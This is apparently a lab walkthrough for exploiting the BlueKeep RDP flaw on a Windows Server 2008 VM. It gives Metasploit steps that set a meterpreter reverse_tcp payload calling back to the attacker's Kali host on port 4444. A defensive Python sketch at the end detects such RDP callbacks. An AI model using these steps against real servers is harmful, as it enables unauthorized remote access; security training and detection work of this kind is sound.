Exploitation
After reconnaissance and scanning, we proceed to gain unauthorized access to the target machine by exploiting the RDP vulnerability with the Metasploit tool in a Kali Linux virtual machine environment.


Firstly, enter the "msfconsole" command to start the Metasploit framework.

Secondly, execute the "search blue keep" command to find available modules pertaining to the BlueKeep exploit.

We will be using module number "1" as it contains the actual bluekeep exploit and scanner while option "0" only contains the scanner.
We then define the settings for our exploit and payload modules. We will be using meterpreter/reverse_tcp as the payload.
1. Set payload to reverse_tcp
2. Set RHOSTS to target machine IP Address (Windows Server 2008)
3. Set LHOST to Kali Linux IP Address
4. Set LPORT to 4444 (Kali Linux)
Thirdly, execute the "show options" command to double-check that the configuration settings made in the previous steps are correct.
In addition, RDP_CLIENT_IP is to be set to an address in the same subnet as the IP address of the device that you run the exploit from, as this is a client-to-server attack. This configuration allows an RDP connection to be made and the exploitation to work.
(Optional) Change the GROOMSIZE parameter to 50. GROOMSIZE relates to the size of the data chunks sent to the target machine; it is set to a lower value than the default to prevent crashes when working with virtual machines.
As shown in the above screenshot, the exploit target is not yet specified. Thus, execute the "show targets" command to see which targets are available for selection.
As there is more than one Windows Server 2008 target available for selection, we look for the VMware version in use and select the specific target. In our case, we will select target number "5".
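
From the defender's side, the settings above leave a recognizable network pattern: an inbound RDP connection to the server, followed shortly by a new outbound connection from the server back to the same host (port 4444 here, per LPORT). The following is an added detection sketch, not part of the original walkthrough; the log format, addresses, function names and the five-minute window are assumptions, and it generalizes to any callback port since LPORT is configurable.

```python
from datetime import datetime, timedelta

RDP_PORT = 3389  # default RDP port (assumption: the server listens on the default)
WINDOW = timedelta(minutes=5)  # assumed correlation window, tune per environment

# Constructed sample: one record per NEW connection
# (time, initiator, responder, destination port).
# Addresses are documentation ranges, not values from the page.
SAMPLE_FLOWS = """\
2024-01-01T10:00:00 192.0.2.10 192.0.2.20 3389
2024-01-01T10:00:40 192.0.2.20 192.0.2.10 4444
2024-01-01T10:05:00 192.0.2.30 192.0.2.20 3389
2024-01-01T10:06:00 192.0.2.20 198.51.100.7 443
2024-01-01T11:00:00 192.0.2.20 192.0.2.30 4444
"""

def parse_flows(text):
    """Parse whitespace-separated connection records, skipping malformed lines."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, src, dst, port = parts
        flows.append((datetime.fromisoformat(ts), src, dst, int(port)))
    return sorted(flows)  # chronological order

def find_callbacks(flows, window=WINDOW):
    """Flag a server that accepted RDP from a peer and then initiates a
    connection back to that same peer within the window."""
    last_rdp = {}  # (server, client) -> time of most recent inbound RDP
    alerts = []
    for ts, src, dst, port in flows:
        if port == RDP_PORT:
            last_rdp[(dst, src)] = ts
            continue
        seen = last_rdp.get((src, dst))
        if seen is not None and ts - seen <= window:
            alerts.append({"server": src, "peer": dst, "port": port,
                           "delay_s": int((ts - seen).total_seconds())})
    return alerts

if __name__ == "__main__":
    for alert in find_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(alert)
```

A server that normally only answers RDP has little reason to open connections toward its own RDP clients, so even a single hit is worth triage.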